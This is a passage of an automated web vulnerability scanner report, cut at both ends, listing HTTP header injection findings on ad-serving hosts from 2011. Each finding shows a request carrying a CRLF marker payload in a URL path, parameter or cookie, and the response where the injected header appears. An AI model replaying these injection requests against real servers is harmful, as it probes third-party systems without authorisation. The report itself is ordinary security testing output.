Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/24bce
68ef865ea3b
/N884.AccuWeather/B4902356.6%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:47 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.34. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.67 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.67

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3f7d8%0d%0a26ff44bf3ad was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3f7d8%0d%0a26ff44bf3ad/N884.AccuWeather/B4902356.67 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3f7d8
26ff44bf3ad
/N884.AccuWeather/B4902356.67:
Date: Thu, 03 Feb 2011 19:03:46 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.35. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.7 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9eb91%0d%0a378d55f361c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9eb91%0d%0a378d55f361c/N884.AccuWeather/B4902356.7 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9eb91
378d55f361c
/N884.AccuWeather/B4902356.7:
Date: Thu, 03 Feb 2011 19:03:44 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.36. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.71 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.71

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3f3a1%0d%0a3af708ef023 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3f3a1%0d%0a3af708ef023/N884.AccuWeather/B4902356.71 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3f3a1
3af708ef023
/N884.AccuWeather/B4902356.71:
Date: Thu, 03 Feb 2011 19:03:41 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.37. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.72 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.72

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5a6e8%0d%0a73f07475f21 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5a6e8%0d%0a73f07475f21/N884.AccuWeather/B4902356.72;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5a6e8
73f07475f21
/N884.AccuWeather/B4902356.72%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:42 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.38. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.73 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.73

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 27833%0d%0a886ea4e3f1b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /27833%0d%0a886ea4e3f1b/N884.AccuWeather/B4902356.73;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/27833
886ea4e3f1b
/N884.AccuWeather/B4902356.73%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:42 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.39. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.74 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.74

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 593ee%0d%0afae69de04e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /593ee%0d%0afae69de04e9/N884.AccuWeather/B4902356.74;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/593ee
fae69de04e9
/N884.AccuWeather/B4902356.74%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:46 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.40. http://ad.doubleclick.net/jump/locm.pp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/locm.pp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8e548%0d%0a0b5406658fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8e548%0d%0a0b5406658fb/locm.pp HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8e548
0b5406658fb
/locm.pp:
Date: Thu, 03 Feb 2011 16:08:51 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.41. http://ad.doubleclick.net/jump/locm.sp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/locm.sp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4cb86%0d%0a56daa9c4c90 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4cb86%0d%0a56daa9c4c90/locm.sp HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4cb86
56daa9c4c90
/locm.sp:
Date: Thu, 03 Feb 2011 16:08:45 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.42. http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/locm.sp/retail_banks_15020100

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2c034%0d%0a52d83d7cc34 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2c034%0d%0a52d83d7cc34/locm.sp/retail_banks_15020100 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2c034
52d83d7cc34
/locm.sp/retail_banks_15020100:
Date: Thu, 03 Feb 2011 16:08:49 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.43. https://ad.doubleclick.net/activity [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ad.doubleclick.net
Path:   /activity

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload ecc0c%0d%0acf3d6eb0e23 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /activity;src=2549153;type=initi091;cat=landi727;ord=1;num=&ecc0c%0d%0acf3d6eb0e23=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://ad.doubleclick.net/activity;src=2549153;type=initi091;cat=landi727;ord=1;num=&ecc0c
cf3d6eb0e23
=1&_dc_ck=try:
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Thu, 03 Feb 2011 13:32:55 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 03 Feb 2011 13:17:55 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


1.44. https://ad.doubleclick.net/activity [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ad.doubleclick.net
Path:   /activity

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 1c6ea%0d%0a39d8322a44 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /activity;src=1c6ea%0d%0a39d8322a44 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://ad.doubleclick.net/activity;src=1c6ea
39d8322a44
&_dc_ck=try:
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Thu, 03 Feb 2011 13:32:55 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 03 Feb 2011 13:17:54 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


1.45. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 7e614%0d%0a039b9159693 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=07e614%0d%0a039b9159693; B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ8i440000000001t2852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF82980000000001t3852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001gYyfadw90cvM00001gL2MadKj0bdR00001fU+La50V0a+r00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; u2=af46648c-e211-44c6-8697-3388c9d721d93Gw030; C4=; ActivityInfo=000p81bBo%5f; u3=1;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=07e614
039b9159693
; expires=Wed, 04-May-2011 14: 04:16 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=af46648c-e211-44c6-8697-3388c9d721d93Gw03g; expires=Wed, 04-May-2011 14:04:16 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 19:04:16 GMT
Connection: close


1.46. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 15095%0d%0aec9ed734f69 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=015095%0d%0aec9ed734f69; B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ8i440000000001t2852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF82980000000001t3852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001gYyfadw90cvM00001gL2MadKj0bdR00001fU+La50V0a+r00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; u2=af46648c-e211-44c6-8697-3388c9d721d93Gw030; C4=; ActivityInfo=000p81bBo%5f; u3=1;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=015095
ec9ed734f69
; expires=Wed, 04-May-2011 14: 04:15 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=af46648c-e211-44c6-8697-3388c9d721d93Gw03g; expires=Wed, 04-May-2011 14:04:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 19:04:14 GMT
Connection: close


1.47. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 4724b%0d%0a3b29ba82741 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2105928&PluID=0&w=728&h=90&ord=634323295494618321&ucm=true&ncu=$$http://a1.interclick.com/icaid/145344/tid/ba650ae4-f985-4f21-8de8-e2f82579ce26/click.ic?$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=2;dcode=ocr;pcode=sant;kw=;ref=;test=;fci=ad;dcopt=;tile=5;sz=728x90;c1=uncategorized;ord=462404263671487.56?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bBo%5f; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=04724b%0d%0a3b29ba82741; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gYyfadwa0cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gYx+adw90cvM00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8i440000000001t2852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=04724b
3b29ba82741
; expires=Wed, 04-May-2011 13: 53:46 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gL2LadMx0bdR00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001gYyfadw90cvM00001fU+La50V0a+r00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; expires=Wed, 04-May-2011 13:53:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ8i440000000001t2852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF82980000000001t3852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; expires=Wed, 04-May-2011 13:53:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Wed, 04-May-2011 13:53:46 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 18:53:46 GMT
Connection: close
Content-Length: 1881

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

1.48. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 50450%0d%0aeb4b41840dc was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4386992~~0~~~^ebAdDuration~3~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.25563961919397116&flv=50450%0d%0aeb4b41840dc&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=2;dcode=ocr;pcode=sant;kw=;ref=;test=;fci=ad;dcopt=;tile=5;sz=728x90;c1=uncategorized;ord=462404263671487.56?
Origin: http://ad.doubleclick.net
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=43909ba7-724d-4dce-bc5a-33ff68e4804e3Gw020; expires=Wed, 04-May-2011 13:53:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=50450
eb4b41840dc
&RES=128&WMPV=0; expires=Wed, 04-May-2011 13: 53:45 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 18:53:45 GMT
Connection: close
Content-Length: 0


1.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 5ce92%0d%0a3da8f15de52 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4386992~~0~~~^ebAdDuration~3~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.25563961919397116&flv=10.1103&wmpv=0&res=5ce92%0d%0a3da8f15de52 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=2;dcode=ocr;pcode=sant;kw=;ref=;test=;fci=ad;dcopt=;tile=5;sz=728x90;c1=uncategorized;ord=462404263671487.56?
Origin: http://ad.doubleclick.net
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=ca112895-8f52-433d-95cd-db7dc6aa59dd3Gw070; expires=Wed, 04-May-2011 13:53:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=5ce92
3da8f15de52
&WMPV=0; expires=Wed, 04-May-2011 13: 53:46 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 18:53:45 GMT
Connection: close
Content-Length: 0


1.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 92d63%0d%0a4e44e1eb37 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4386992~~0~~~^ebAdDuration~3~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.25563961919397116&flv=10.1103&wmpv=92d63%0d%0a4e44e1eb37&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=2;dcode=ocr;pcode=sant;kw=;ref=;test=;fci=ad;dcopt=;tile=5;sz=728x90;c1=uncategorized;ord=462404263671487.56?
Origin: http://ad.doubleclick.net
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=d3701055-7b90-43e3-9882-55604d1326cd3Gw060; expires=Wed, 04-May-2011 13:53:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=92d63
4e44e1eb37
; expires=Wed, 04-May-2011 13: 53:46 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 18:53:45 GMT
Connection: close
Content-Length: 0


1.51. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload aabf4%0d%0a30b9c2776ab was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=&$=aabf4%0d%0a30b9c2776ab&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; 